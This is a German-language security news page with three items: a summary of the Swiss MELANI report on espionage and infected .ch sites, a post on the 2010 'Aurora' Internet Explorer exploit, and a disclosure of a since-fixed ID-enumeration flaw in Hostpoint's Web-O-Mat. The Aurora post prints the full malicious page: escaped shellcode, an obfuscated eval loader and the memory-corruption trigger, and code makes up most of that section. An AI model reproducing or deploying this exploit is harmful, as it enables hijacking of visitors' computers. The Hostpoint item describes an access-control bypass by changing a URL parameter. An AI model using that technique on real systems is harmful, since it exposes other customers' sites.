News
MELANI Sicherheitsbericht (Nov 2010)
Vermehrte Spionagefälle und Datendiebstahl - Elfter Bericht der Melde- und Analysestelle Informationssicherung
Im ersten Halbjahr 2010 sind weltweit vermehrt Fälle von Spionage und gestohlenen Daten zu verzeichnen. Oft werden dazu Webseiten oder Netzwerke gehackt. Dies dient auch dazu, Schadsoftware zu verteilen oder politisch motivierte Absichten zu verwirklichen. Damit geschädigte Schweizer Webseiten ausfindig gemacht werden, setzt die Melde- und Analysestelle Informationssicherung (MELANI) seit diesem Jahr ein neues Werkzeug ein. Zudem kann sie neu .ch-Domains blockieren lassen, um den Missbrauch von Internetadressen zu bekämpfen.
Spionage als Trend
Im
ersten Halbjahr 2010 standen grosse Unternehmen aus der IKT-Branche wie
Google oder der Softwarehersteller Adobe im Fokus von gezielten
Spionageangriffen. In diesen Fällen existieren Hinweise auf
Gemeinsamkeiten bezüglich der verwendeten Infrastruktur, weshalb sie
nicht als Einzelfälle betrachtet werden dürfen. Vielmehr liegt die
Vermutung nahe, dass es sich bei all diesen Vorfällen um ein und
dieselben Angreifer handeln könnte.
MELANI überprüft Schweizer Webseiten auf Infektionen
Weiterhin
werden Webseiten infiziert mit dem Ziel, ahnungslose Internetbenutzer
zu schädigen. Um Webauftritte zu manipulieren und mit Schadsoftware zu
infizieren, werden meistens die FTP-Zugangsdaten wie Passwort und Login
gestohlen und damit auf den Webserver zugegriffen oder es werden
Sicherheitslücken von Websoftware ausgenützt. MELANI betreibt seit April
dieses Jahres ein spezielles Checktool, um Webseiten mit .ch-Domain auf
allfällige Infektionen zu überprüfen. Eine erste Bilanz der Monate Juni
bis August 2010 zeigt, dass MELANI auf über 237‘000 kontrollierten
Webseiten 148 infizierte Fälle ausfindig machen konnte.
Verdächtige .ch-Domains blockiert
Besteht
der Verdacht, dass eine Schweizer Internetadresse missbraucht wird, um
an schützenswerte Daten zu gelangen oder schädliche Software zu
verbreiten, muss dies gestoppt werden. Die seit Anfang Jahr revidierte
Verordnung über die Adressierungselemente im Fernmeldebereich (AEFV)
bietet die gesetzlichen Grundlagen für ein solches Vorgehen: Demnach
kann SWITCH, die Registrierungsstelle für .ch-Domains, Schweizer
Internetadressen blockieren und die Zuweisung zum entsprechenden
Namensserver aufheben, wenn der Verdacht auf Missbrauch besteht und eine
vom Bundesamt für Kommunikation (BAKOM) anerkannte Stelle dies
beantragt hat. Seit dem 15. Juni dieses Jahres ist MELANI vom BAKOM als
kompetente Stelle anerkannt und kann nun bei SWITCH eine Blockierung
beantragen.
Aurora Exploit (Jan 2010)
The "Aurora" IE Exploit in Action from The Crew of Praetorian Prefect on Vimeo.
Mit Hilfe des Aurora exploit kann über eine präparierte Website der Computer eines Users der Website kontrolliert werden - das Video demonstriert das Vorgehen.
Hier der Schadcode der auf der Website eingesetzt wird:
<html><script>var sc = unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053
%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8
%ub230%u81d9%u9a30%ud8db%u3ad8%ub021%uebb4%ud8ea%uabb0%ubdb0%u8cb4%u9e53%u30d4%uda69%ud8d8
%u3053%ud9b2%u3081%udbfb%ud8d8%u213a%u3459%ud9d8%ud8d8%u0453%u1b59%ud858%ud8d8%ud8b2%uc2b2
%ub28b%u27d8%u9c8e%u18eb%u5898%udbe4%uadd8%u5121%u485e%ud8d8%u1fd8%udbdc%ub984%ubdf6%u9c1f
%udcdb%ubda0%ud8d8%u11eb%u8989%u8f8b%ueb89%u5318%u989e%u8630%ud8da%u5bd8%ud820%u5dd7%ud9a7
%ud8d8%ud8b2%ud8b2%udbb2%ud8b2%udab2%ud8b0%ud8d8%u8b18%u9e53%u30fc%udae5%ud8d8%u205b%ud727
%u865c%ud8d9%u51d8%ub89e%ud8b2%u2788%uf08e%u9e51%u53bc%u485e%ud8d8%u1fd8%udbdc%uba84%ubdf6
%u9c1f%udcdb%ubda0%ud8d8%ud8b2%ud8b2%udab2%ud8b2%ud8b2%ud8b0%ud8d8%u8b98%u9e53%u30fc%ud923
%ud8d8%u205b%ud727%uc45c%ud8d9%u51d8%u5c5e%ud8d8%u51d8%u5446%ud8d8%u53d8%ub89e%ud8b2%ud8b2
%ud8b2%u9e53%u88b8%u8e27%u1fe0%ua89e%ud8d8%ud8d8%u9e1f%ud8ac%ud8d8%u59d8%ud81f%ud8da%uebd8
%u5303%ubc86%ud8b2%u9e55%u88a8%ud8b0%ud8dc%u8fd8%uae27%u27b8%udc8e%u11eb%ud861%ud8dc%u58d8
%ud7a4%u4d27%ud4ac%ua458%u27d7%uacd8%u58dd%ud7ac%u4d27%u333a%u1b53%ud8f5%ud8dc%u5bd8%ud820
%udba7%u8651%ub2a8%u55d8%uac9e%u2788%ua8ae%u278f%u5c6e%ud8d8%u27d8%ue88e%u3359%udcd8%ud8d8
%u235b%ua7d8%u277d%ub8ae%u8e27%u27ec%u5c6e%ud8d8%u27d8%uec8e%u5e53%ud848%ud8d8%u4653%ud854
%ud8d8%udc1f%u84db%uf6b9%u8bbd%u8e27%u53f4%u5466%ud8d8%u53d8%u485e%ud8d8%u1fd8%udfdc%uba84
%ubdf6%u3459%ud9d8%ud8d8%u0453%ud8b0%ud8d9%u8bd8%ud8b0%ud8d9%u8fd8%ud8b2%ud8b2%u8e27%u53c4
%ueb23%ueb18%u5903%ud834%ud8da%u53d8%u5b14%u8c20%ud0a5%uc451%u5bd9%udc18%u2b33%u1453%u0153
%u1b5b%uebc8%u8818%u8b89%u8888%u8888%u8888%u888f%u5388%ud09e%u2f30%ud8d8%u53d8%ue4a6%uec30
%ud8d9%u30d8%ud8ef%ud8d8%ubbb0%uafae%ub0d8%ub0ab%ub7bc%u538c%ud49e%u6e30%ud8d8%u51d8%ue49e
%u79bc%ud8dc%ud8d8%u7855%u27b8%u2727%ubdb2%uae27%u53e4%uc89e%u4230%ud8d8%uebd8%u8b03%u8b8b
%u278b%u3008%ud83d%ud8d8%u3459%ud9d8%ud8d8%u2453%u1f5b%u1fdc%ueadf%u49ac%u1fd4%udc9f%u51bb
%u9709%u9f1f%u78d0%u4fbd%u1f13%ud49f%u9889%ua762%u9f1f%ue6c8%u6ec5%u1fe1%ucc9f%ub160%uc30c
%u9f1f%u66c0%ubea7%u1f78%uc49f%u7124%u75ef%u9f1f%u40f8%uc8d2%ubc20%ue879%ud8d8%u53d8%ud498
%ua853%u75c4%ub053%u53d0%u512f%ubc8e%udcb2%u3081%ud87b%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0
%ubdab%u8caa%ude53%uca30%ud8d8%u53d8%ub230%u81dd%u5c30%ud8d8%u3ad8%ueb21%u8f27%u8e27%u58dc
%u30e0%ue058%uad31%u59c9%udda0%u4848%u4848%ud0ac%u2753%u538d%u5534%udd98%u3827%ue030%ud8d8
%u1bd8%ue058%u5830%u31e0%uc9ad%ua059%u48dd%u4848%uac48%ub03f%ud2d0%ud8d8%u9855%u27dd%u3038
%ud8cf%ud8d8%u301b%ud8c9%ud8d8%uc960%udcd9%u1a58%ud8d4%uda33%u1b80%u2130%u2727%u8327%udf1e
%u5160%ud987%u1fbe%udd9f%u3827%u8b1b%u0453%ub28b%ub098%uc8d8%ud8d8%u538f%uf89e%u5e30%u2727
%u8027%u891b%u538e%ue4ad%uac53%ua0f6%u2ddb%u538e%uf8ae%u2ddb%u11eb%u9991%udb75%ueb1d%ud703
%uc866%u0ee2%ud0ac%u1319%udbdf%u9802%u2933%uc7e3%u3fad%u5386%ufc86%u05db%u53be%u93d4%u8653
%udbc4%u5305%u53dc%u1ddb%u8673%u1b81%uc230%u2724%u6a27%u3a2a%u6a2c%ud7ee%u28cb%ua390%ueae5
%u49ac%u5dd4%u7707%ubb63%u0951%u8997%u6298%udfa7%ufa4a%uc6a8%ubc7c%u4b37%u3cea%u564c%ud2cb
%ua174%u3ee1%u1c40%uc755%u8fac%ud5be%u9b27%u7466%u4003%uc8d2%u5820%u770e%u2342%ucd8b%ub0be
%uacac%ue2a8%uf7f7%ubdbc%ub7b5%uf6e9%uacbe%ub9a8%ubbbb%uabbd%uf6ab%ubbbb%ubcf7%ub5bd%uf7b7
%ubcb9%ub2f6%ubfa8%u00d8");
var sss = Array(826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, 784, 707, 280,
238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, 700, 238, 287, 413, 224, 833,
728, 735, 756, 707, 280, 770, 322, 756, 707, 770, 721, 812, 728, 420, 427, 371, 350, 364,
350, 392, 392, 287, 224, 770, 301, 427, 770, 413, 224, 770, 427, 770, 322, 805, 819, 686,
805, 812, 798, 735, 770, 721, 280, 336, 448, 371, 350, 364, 350, 378, 399, 315, 805, 693,
322, 756, 707, 770, 721, 812, 728, 287, 413, 826, 679, 798, 224, 840, 427, 770, 707, 833,
224, 455, 798, 798, 679, 847, 280, 287, 413, 224, 714, 777, 798, 280, 826, 679, 798, 224,
735, 427, 336, 413, 735, 420, 350, 336, 336, 413, 735, 301, 301, 287, 224, 861, 840, 637,
735, 651, 427, 770, 301, 805, 693, 413, 875);
var arr = new Array;
for (var i = 0; i < sss.length; i ++ ){
arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, ""
);
cc = cc.replace(/@/g, ",");
eval(cc);
var x1 = new Array();
for (i = 0; i < 200; i ++ ){
x1[i] = document.createElement("COMMENT");
x1[i].data = "abc";
}
;
var e1 = null;
function ev1(evt){
e1 = document.createEventObject(evt);
document.getElementById("sp1").innerHTML = "";
window.setInterval(ev2, 50);
}
function ev2(){
p = "
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
for (i = 0; i < x1.length; i ++ ){
x1[i].data = p;
}
;
var t = e1.srcElement;
}
</script><span id="sp1"><IMG src="aaa.gif" onload="ev1(event)"></span></body></html>
Sicherheitslücke bei Hostpoint (April 2009)
Netsolutions Sicherheitsexperte Andriu Isenring Ritsch findet Sicherheitslücke bei Hostpoint, dem grössten Webhoster der Schweiz.
Kunden von Hostpoint können mit einem Tool namens Web-O-Mat eine einfache Website erstellen. Das Tool basiert auf der Software cm4all und erlaubt es auch unterfahrenen AnwenderInnen eine einfache Website mit Webshop oder anderen interaktiven Bestandteilen zu erstellen.
Durch das Controlpanel von Hostpoint können die Kunden (nach erfolgtem Login) eine neue Website mit diesem Tool erzeugen und diese auch verwalten.
Der Link zum Web-O-Mat beinhaltet einen Parameter der die zu bearbeitende Website identifizert - dieser Link beinhaltet folgende Schwachstellen:
1) Der Parameter besteht aus einer fortlaufenden Ganzzahl
2) Das Web-O-Mat Tool prüft nicht ob der eine Site aufrufende User auch berechtigt ist die aufgerufene Seite zu sehen oder zu bearbeiten
Der Link hat folgendes Format:
https://admin.hostpoint.ch/customer/Webomat/Overview?_action_login&id=42030
Tests haben nun gezeigt dass im Bereich von 1 bis 42676 etwa alle 1 bis 5 Schritte eine Web-O-Mat Site vorhanden ist.
Wenn nun der Parameter "id" mit einer Zahl in diesem Bereich ersetzt wird können so fremde Webseiten aufgerufen und bearbeitet werden.
Die Veröffentlichung direkt auf die Website des rechtmässigen Inhabers ist nicht möglich, sobald aber der rechtmässige Inhaber seine Site erneut selbst verföffentlicht werden so gemachte Änderungen auch übernommen.
Zudem kann die Site durch den Eintringlich gelöscht werden, gewisse Werte wie Seitentitel oder Shoppreise werden auch direkt übernommen.
Now publishing such a site will publish the changes to the original web host owned by the control panel user accessing the foreign site.
Problematisch ist auch dass über diese Funktion Webseiten eingesehen werden können die noch gar nicht publiziert sind oder nicht mehr publiziert sein sollten.
Geschätzte 6000-10000 Web-O-Mat User sind von dieser Lücke betroffen.
Hospoint wurde am 3.4.2009 vom Tages Anzeiger über die Lücke informiert - am 4.4.2009 war die Lücke geschlossen.